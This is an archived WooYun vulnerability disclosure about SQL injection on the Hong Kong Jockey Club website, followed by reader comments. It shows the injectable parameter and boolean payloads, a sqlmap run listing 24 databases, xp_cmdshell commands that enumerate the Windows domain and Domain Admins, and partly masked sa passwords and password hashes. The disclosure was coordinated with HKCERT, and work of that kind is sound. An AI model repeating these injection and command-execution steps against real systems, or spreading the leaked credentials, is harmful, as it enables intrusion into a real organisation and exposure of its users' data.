当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146262

漏洞标题:香港马会官网存在SQL注入漏洞(可穿透边界防火墙进入内网,可导致博彩用户信息泄露)(香港地區)

相关厂商:香港赛马会

漏洞作者: 猪猪侠

提交时间:2015-10-12 19:49

修复时间:2015-11-27 15:24

公开时间:2015-11-27 15:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-23: 细节向核心白帽子及相关领域专家公开
2015-11-02: 细节向普通白帽子公开
2015-11-12: 细节向实习白帽子公开
2015-11-27: 细节向公众公开

简要描述:

香港马会官网存在SQL注入漏洞,可影响网站核心数据:24个数据库。
注入点SA权限,可利用xp_cmdshell执行系统命令,直接获取马会数据库系统权限。
香港马会(http://www.hkjc.com)是于1884年成立的一家私人会所,发展至今已成为亚洲最大、最高级的会员会所之一,六合彩由香港赛马会以“香港马会奖券有限公司”的名义代理接受投注。

详细说明:

#1 受影响网站

hkjc_web.jpg


#2 SQL注入点
~回显正常 and 1=1

http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923 and 1=1

hkjc_sql_1.jpg


~回显错误 and 1=2

http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923 and 1=2

hkjc_sql_2.jpg

漏洞证明:

#!!!注入点是一个DBA权限的,可以直接执行系统命令

E:\MSSQL10.WCMSDBSQL\MSSQL\Log\ERRORLOG
os-shell>whoami
rhkjc_dm\sqladm
os-shell>net time /domain // 域控服务器
Current time at \\JCDC**.**.**.**


rhkjc_dm\sqladm ,马会最核心的是数据,域控方式启动,等于所有的数据库服务器,都可以使用这个用户以SA权限直接连接。
整个香港马会公司,信息系统用户列表,5000*3,上万用户:

net user.jpg


系统管理员列表:

os-shell>net group "Domain Admins" /domain
The request will be processed at a domain controller for domain **.**.**.**.
Group name     Domain Admins    
Comment        Designated administrators of the domain 
Members
-------------------------------------------------------------------------------
Administrator            BITLOCKERADMIN           BIZTALKADM 
COOPS1                   EIADMIN_R                MOMACTION 
ocsadmin                 PIM_HYENA                PIM_SUPERADMIN
SCHEDULEADM              wcmsadmin 
The command completed successfully.


#3 SQLMAP上工具
数据库用户名:CustomUser
当前数据库:CustomDB (用户数据库,怕与香港古惑仔结仇,故不在此描述)

CustomDB.jpg


python sqlmap.py -u "http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923"


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uniqueMatchCode (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uniqueMatchCode=43923 AND 7912=7912
---
[19:12:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [24]:
[*] CustomDB
[*] iwcommon
[*] iwevent
[*] iwlscspreview
[*] iwlscsruntime
[*] iwlscsruntime02
[*] iwlscsruntime51
[*] iwlscsruntime52
[*] iwlsdisplay
[*] iwreport
[*] iwsitepub
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ts73_iwcommon
[*] ts73_iwlscsruntime
[*] ts73_iwlscsruntime_PRELS01
[*] ts73_iwlscsruntime_PRELS51
[*] ts73_iwlsds
[*] ts73_iwlsds_PRELS01
[*] ts73_iwlsds_PRELS51
[*] ts73_iwsitepub
[*] ts73_iwtsreporting


数据库的SA密码,可以直接使用openDataSource来利用xp_cmdshell远程执行命令;

componentName: CommonServices
jdbc:sqlserver://WCMSDBSQL:40000;databaseName=iwcommon
userName : sa
userPwd  : 8/sPlwrX/T7gu8ztoDx3********
componentName: TSREPORTS
jdbc:sqlserver://WCMSDBSQL:40000;databaseName=iwreport
userName : sa
userPwd  : DYC4vZGy6iJqtwNeHHrjI********
componentName: BasicReports
jdbc:sqlserver://WCMSDBSQL:40000;databaseName=iwcommon
userName : sa
userPwd  : nM3OI6DIrxY1+RjjWTlpo4********


数据库系统密码HASH

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x010093b104fc8426f57ac7a9e67*********396c0ec7be
        header: 0x0100
        salt: 93b104fc
        mixedcase: 8426f57ac7a9e67487f*******96c0ec7be
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01008d22a249df5ef3b79ed**********9cfc5ff954dd2d0f
        header: 0x0100
        salt: 8d22a249
        mixedcase: df5ef3b79ed321563a********f954dd2d0f
[*] CustomUser [1]:
    password hash: 0x010001eb7a73d3c4b97b224cb********c6fc0443165db
        header: 0x0100
        salt: 01eb7a73
        mixedcase: d3c4b97b224cb02df8259857780c6fc0443165db
[*] sa [1]:
    password hash: 0x010056049b0eb5e2dbc7ad******154592ac25fb5
        header: 0x0100
        salt: 56049b0e
        mixedcase: b5e2dbc7ad5a881ea5329*********ac25fb5


# 由于用户数据敏感,不在本报告中列出

修复方案:

#1 安全过滤

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-10-13 15:23

厂商回复:

已將事件通知有關機構

最新状态:

暂无

漏洞评价:

评价

  1. 2015-10-12 19:55 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    高潮迭起

  2. 2015-10-12 20:02 | Xmyth_Xi2oMin9 ( 普通白帽子 | Rank:400 漏洞数:56 | 或许这条路跟我最初预想的并不一样,但有什...)

    最近香港好火 (-_-)/

  3. 2015-10-12 20:02 | Drizzle.Risk ( 普通白帽子 | Rank:265 漏洞数:20 | You have an error in your SQL syntax; ch...)

    竟然是asp的

  4. 2015-10-12 20:03 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    猪哥 别闹 我知道是你

  5. 2015-10-12 20:13 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    卧槽。。。

  6. 2015-10-12 20:16 | 我的邻居王婆婆 ( 普通白帽子 | Rank:2991 漏洞数:508 | 刚发现个好洞网站就挂了)

    猪哥 别闹 我知道是你

  7. 2015-10-12 20:18 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    猪哥 别闹 我知道是你

  8. 2015-10-12 20:19 | loopx9 认证白帽子 ( 普通白帽子 | Rank:768 漏洞数:78 | ..)

    猪哥 别闹 我知道是你

  9. 2015-10-12 20:24 | 1937nick ( 普通白帽子 | Rank:123 漏洞数:40 | 水能载舟,亦能煮粥。物尽其用,人尽其能。)

    开奖日期2015-10-11 117期 22狗36猴46狗4龙35鸡21猪 + 40龙

  10. 2015-10-12 20:28 | 90Snake ( 普通白帽子 | Rank:148 漏洞数:49 | 人如果没有梦想,跟咸鱼有什么分别)

    猪哥 别闹 我知道是你

  11. 2015-10-12 20:49 | phith0n 认证白帽子 ( 普通白帽子 | Rank:751 漏洞数:118 | 一个想当文人的黑客~)

    自从hk cert来了以后,香港都被你们日穿了

  12. 2015-10-12 20:50 | Mark0smith ( 普通白帽子 | Rank:113 漏洞数:48 )

    香港马会,666

  13. 2015-10-12 20:54 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1850 漏洞数:296 | 风暴网络安全空间:http://www.heysec.or...)

    确实是@猪猪侠 大牛的,无论是标题( WooYun: UCloud设计不当导致防火墙被绕过+第三方问题 )还是精华漏洞数(应该24个,数了下只有23个)

  14. 2015-10-12 21:01 | JGHOOluwa ( 普通白帽子 | Rank:438 漏洞数:70 | 就是来看看大牛们如何超神的^-^)

    @HackBraid 论社工与反社工~

  15. 2015-10-12 21:40 | 慢慢 ( 普通白帽子 | Rank:773 漏洞数:201 | 低调求发展)

    自从hk cert来了以后,香港都被你们日穿了

  16. 2015-10-12 21:55 | 浩天 认证白帽子 ( 核心白帽子 | Rank:925 漏洞数:80 | 哈!躁起来!)

    我顶你个肺啊,衰仔

  17. 2015-10-12 22:21 | goubuli ( 普通白帽子 | Rank:487 漏洞数:97 )

    @HackBraid 叼 分析到位

  18. 2015-10-12 22:43 | 动感超人 ( 实习白帽子 | Rank:46 漏洞数:11 | 小心动感光波)

    香港马会啊,老有钱了

  19. 2015-10-12 22:51 | scanf ( 核心白帽子 | Rank:1423 漏洞数:203 | 。)

    这个叼

  20. 2015-10-12 23:14 | 小红猪 ( 普通白帽子 | Rank:285 漏洞数:54 | little red pig!)

    我咋访问不了,难道把整个大陆都给封掉了,哈哈哈..

  21. 2015-10-13 00:26 | _Thorns ( 普通白帽子 | Rank:1662 漏洞数:248 | WooYun is the Bigest gay place. 网络工...)

    猪哥别闹,我知道是你。因为…你在群里发过……

  22. 2015-10-13 00:30 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  23. 2015-10-13 09:00 | king7 ( 普通白帽子 | Rank:1623 漏洞数:237 )

    这个别被砍啊

  24. 2015-10-13 09:28 | 丨丶钟情 ( 路人 | Rank:6 漏洞数:2 | 我就看看 不提交漏洞)

    我的发财梦~~~就这样被你日了 = =

  25. 2015-10-13 09:52 | 泳少 ( 普通白帽子 | Rank:233 漏洞数:81 | ★ 梦想这条路踏上了,跪着也要...)

    @猪猪侠 出来吧

  26. 2015-10-13 10:12 | 随风的风 ( 普通白帽子 | Rank:211 漏洞数:76 | 微信公众号:233sec 不定期分享各种漏洞思...)

    猪猪侠,就是你!

  27. 2015-10-13 10:22 | 乐乐、 ( 普通白帽子 | Rank:868 漏洞数:189 )

    我猜 猪猪侠

  28. 2015-10-13 10:41 | f4ckbaidu ( 普通白帽子 | Rank:223 漏洞数:28 | 开发真是日了狗了)

    来看看一个SQL注入为毛能打雷

  29. 2015-10-13 11:07 | 胡小树 ( 实习白帽子 | Rank:66 漏洞数:13 | 我是一颗小小树)

    @f4ckbaidu 这个如果是猪哥的,为啥我没提醒那。应该是别人的发的吧。打雷说明影响大,随便改改中奖数据啥的,发家致富不是梦

  30. 2015-10-13 11:22 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    @HackBraid 社工高手

  31. 2015-10-13 11:31 | Format_smile ( 普通白帽子 | Rank:347 漏洞数:126 | ···孰能无过,谁是谁非!)

    一看就是猪哥

  32. 2015-10-13 13:54 | 大物期末不能挂 ( 普通白帽子 | Rank:132 漏洞数:23 | 1.一个学渣,只求每门都不挂2.想把漏洞提...)

    猪哥 别闹 我知道是你

  33. 2015-10-14 20:02 | Azazel ( 实习白帽子 | Rank:38 漏洞数:8 | 别威胁哥,哥不是好惹的)

    猪哥 别闹 我知道是你

  34. 2015-10-27 23:04 | 指尖的温度 ( 路人 | Rank:27 漏洞数:10 )

    哎呀wocaowocao,丧(gan)心(de)病(piao)狂(liang)

  35. 2015-11-06 15:29 | 深蓝 ( 普通白帽子 | Rank:1117 漏洞数:240 | 我就静静的看着,我就是不理你。)

    @疯狗 坑爹的东西。。。